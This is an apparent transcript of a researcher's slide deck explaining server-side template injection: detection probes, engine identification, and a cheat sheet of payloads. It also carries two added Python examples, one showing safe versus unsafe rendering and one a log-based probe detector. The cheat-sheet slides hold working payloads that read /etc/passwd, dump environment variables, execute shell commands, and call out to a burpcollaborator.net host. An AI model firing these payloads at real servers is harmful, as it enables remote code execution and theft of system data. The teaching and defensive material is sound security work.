
Server Side Template Injection

Dhamu
September 25, 2021



Transcript

  1. Whoami. Dhamotharan, Offensive Web Application Security Researcher. Occasional bug bounty hunter on HackerOne, Bugcrowd, etc. Dhamu_offi on Twitter.
  2. Template Injection. Template injection allows an attacker to inject template code into an existing template (or to supply a template where none existed). A template engine makes designing HTML pages easier by using static template files in which, at runtime, variables/placeholders are replaced with actual values to produce the final HTML pages.
  3. Template Injection. Template engines are designed to combine templates with a data model to produce result documents, which helps populate web pages with dynamic data. Template engines can be used to display information about users, products, etc. Some of the most popular template engines are:
     • PHP – Smarty, Twig
     • Java – Velocity, FreeMarker
     • Python – Jinja, Mako, Tornado
     • JavaScript – Jade, Rage
     • Ruby – Liquid
  4. Server Side Template Injection (SSTI). Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server side.
  5. SSTI. Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server side. This vulnerability occurs when unvalidated user input is embedded into the template engine, which can generally lead to remote code execution (RCE).
  6. Detect. This vulnerability can appear in two distinct contexts, each of which requires its own detection method:
     1. Plaintext context
     2. Code context
     Story for illustration purposes only: a request with smarty=Hello {user.name} renders as "Hello user1"; a request with smarty=Hello ${7*7} renders as "Hello 49", showing that the expression was evaluated rather than echoed; a request with personal_greeting=username renders as "Hello user0".
  7. Plaintext context. The given input is rendered and reflected into the response. Try placing mathematical operations inside a template expression and check whether the result is evaluated:
     render('Hello ' + username)
     http://vulnerable-website.com/?username=${7*7}
     Probe expressions for different engines: {{7*7}}  ${7*7}  <%= 7*7 %>  ${{7*7}}
  8. Code context. In these cases the user input is placed within a template expression:
     greeting = getQueryParameter('greeting')
     engine.render("Hello {{"+greeting+"}}", data)
     http://vulnerable-website.com/?greeting=data.username}}<tag>
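Both the render('Hello ' + username) pattern on the previous slide and engine.render("Hello {{"+greeting+"}}", data) above build the template source out of user input, which is the root cause in both contexts. The following is an added example, not code from the deck or from any of the engines it lists. It uses Python's standard-library string.Template, whose ${ } syntax matches the deck's ${7*7} probe, as a stand-in for a real engine, and contrasts the concatenation pattern with the fix: keep the template fixed and pass user input only as a data value. The CONTEXT dictionary and its keys are constructed for the illustration.

```python
from string import Template

# Constructed data model (not from the deck): what an application hands to its
# template engine alongside the page template. The second key stands in for the
# environment variables and internal objects that a template context typically
# exposes to whoever controls the template source.
CONTEXT = {"name": "user1", "db_password": "example-secret-not-real"}


def render_unsafe(username):
    """The deck's render('Hello ' + username) pattern: user input becomes part
    of the template source, so the engine parses it as template code."""
    return Template("Hello " + username).substitute(CONTEXT)


def render_safe(username):
    """Fixed template; user input enters only as a data value. Whatever the user
    sends is substituted as text and is never parsed for placeholders."""
    return Template("Hello $name").substitute(CONTEXT, name=username)


def unsafe_outcome(username):
    """Wrap render_unsafe so a parse error is returned instead of raised.
    A malformed expression such as ${7*7} makes string.Template raise
    ValueError; in a real application that surfaces as a 500 response, which
    is itself a signal that the input reached the template parser."""
    try:
        return render_unsafe(username)
    except (ValueError, KeyError) as exc:
        return f"error: {exc}"


if __name__ == "__main__":
    # The deck's "Hello user1" example, a context-variable leak, and the
    # arithmetic probe, each rendered through the vulnerable and the fixed path.
    for probe in ["user1", "${name}", "${db_password}", "${7*7}"]:
        print(f"{probe!r:18} unsafe -> {unsafe_outcome(probe)!r}")
        print(f"{'':18} safe   -> {render_safe(probe)!r}")
```

The same two shapes exist in every engine on the deck: the vulnerable one concatenates untrusted text into the string the engine compiles, the safe one compiles a constant template and binds the untrusted text through the data model. With string.Template the worst case is a context leak or an error; with the engines in the cheat sheet slides, the same concatenation reaches the code-execution payloads shown there.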
  9. Identify. Once template injection potential has been detected, the next step is to identify the template engine. Although there are a huge number of templating languages, many of them use very similar syntax that is specifically chosen not to clash with HTML characters. As a result, it can be relatively simple to create probing payloads to test which template engine is being used.
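Because the probe syntax is so similar across engines, the same handful of delimiters also makes a usable detection signature on the defending side. The following is an added example, not part of the deck: a Python script that parses access-log lines in Common Log Format and flags query parameters carrying the plaintext-context probes from slide 7 ({{7*7}}, ${7*7}, <%= 7*7 %>) or the code-context pattern from slide 8 (a closing }} with no opening delimiter). The log lines, IP addresses, timestamps and parameter names are constructed; the regular expressions are the author's own, not taken from any tool.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the deck). Requests 2-5 carry the
# probe expressions shown on the Detect slides; requests 1 and 6 are ordinary
# traffic that must not be flagged (note the literal "$100" in request 6).
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2021:10:00:01 +0000] "GET /?username=alice HTTP/1.1" 200 512
203.0.113.5 - - [25/Sep/2021:10:00:02 +0000] "GET /?username=%7B%7B7*7%7D%7D HTTP/1.1" 200 498
203.0.113.5 - - [25/Sep/2021:10:00:03 +0000] "GET /?username=%24%7B7*7%7D HTTP/1.1" 200 498
203.0.113.5 - - [25/Sep/2021:10:00:04 +0000] "GET /?greeting=data.username%7D%7D%3Ctag%3E HTTP/1.1" 500 0
203.0.113.5 - - [25/Sep/2021:10:00:05 +0000] "GET /?username=%3C%25%3D+7*7+%25%3E HTTP/1.1" 200 498
198.51.100.7 - - [25/Sep/2021:10:00:06 +0000] "GET /search?q=price+%24100 HTTP/1.1" 200 2048
"""

# Common Log Format request line; only the fields the detector needs.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Expression delimiters of the engine families the deck names. Each pattern
# requires an opening and a closing delimiter with something in between.
DELIMITED = [
    ("{{ }}", re.compile(r"\{\{.+?\}\}")),   # Jinja, Twig, Tornado
    ("${ }", re.compile(r"\$\{.+?\}")),      # Velocity, FreeMarker, Mako, EL
    ("<% %>", re.compile(r"<%=?.+?%>")),     # ERB
    ("#{ }", re.compile(r"#\{.+?\}")),       # Slim, EL
]
ARITHMETIC = re.compile(r"\d+\s*\*\s*\d+")
# The code-context probe closes an expression the server itself opened, so the
# request carries a closing delimiter with no matching opener.
UNBALANCED = [("}}", "{{"), ("%>", "<%")]


def classify_value(value):
    """Return a reason string if `value` looks like a template probe, else None."""
    for label, pattern in DELIMITED:
        match = pattern.search(value)
        if match:
            reason = f"delimited expression {label}"
            if ARITHMETIC.search(match.group(0)):
                reason += " with arithmetic probe"
            return reason
    for closer, opener in UNBALANCED:
        if closer in value and opener not in value:
            return f"unbalanced closing delimiter {closer} (code-context probe)"
    return None


def analyze_line(line):
    """Parse one access-log line; return a finding dict or None."""
    match = LOG_LINE.match(line)
    if not match:
        return None
    query = urlsplit(match.group("target")).query
    # parse_qsl percent-decodes values and turns '+' into spaces, the same
    # normalisation the application applies before a value reaches a template.
    for param, value in parse_qsl(query, keep_blank_values=True):
        reason = classify_value(value)
        if reason:
            return {
                "ip": match.group("ip"),
                "status": int(match.group("status")),
                "param": param,
                "value": value,
                "reason": reason,
            }
    return None


def scan_log(text):
    """Run analyze_line over every line of the log and keep the findings."""
    return [f for f in (analyze_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ip']} {finding['param']}={finding['value']!r} "
              f"status={finding['status']} -> {finding['reason']}")
```

The status code is kept in each finding because a 500 on a request carrying a stray closing delimiter (request 4 above) is the server-side symptom of the code-context case: the injected }} broke the expression the application was building, which is exactly what the probe is meant to reveal. Only the query string is inspected here; a production rule would apply classify_value to POST bodies, headers and cookies as well, since any of them can reach a template.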
  10. Exploit. Template engines are examined to show the exploit methodology in practice and to make a case for the severity of the issue. The findings may appear to show flaws in the template engines themselves, but unless an engine markets itself as suitable for user-submitted templates, the responsibility for preventing template injection ultimately lies with web application developers. Useful references when examining an engine: lists of built-in methods, functions, filters and variables; lists of extensions/plugins, some of which may be enabled by default.
  11. Exploit – Generic. In this wordlist you can find variables defined in the environments of some of the engines mentioned below:
      https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt
      https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
  12. Automated Tools. Tplmap assists in the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with several sandbox escape techniques to get access to the underlying operating system. The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tools during web application penetration tests.
  13. CheatSheet
      • Ruby
        ◦ Basic injections
        ◦ Retrieve /etc/passwd
        ◦ List files and directories
      • Java
        ◦ Basic injection
        ◦ Retrieve the system’s environment variables
        ◦ Retrieve /etc/passwd
      • Expression Language (EL)
        ◦ Basic injection
        ◦ Code execution
  14. Ruby – Basic injections
      ERB: <%= 7 * 7 %>
      Slim: #{ 7 * 7 }
      Ruby – Retrieve /etc/passwd: <%= File.open('/etc/passwd').read %>
      Ruby – List files and directories: <%= Dir.entries('/') %>
  15. Java – Basic injection: ${7*7}  ${class.getClassLoader()}
      Java – Retrieve the system’s environment variables: ${T(java.lang.System).getenv()}
      Java – Retrieve /etc/passwd: ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
  16. Expression Language (EL) – Basic injection: ${1+1}  #{1+1}
      Expression Language (EL) – One-liner injections not including code execution:
      // DNS Lookup
      ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}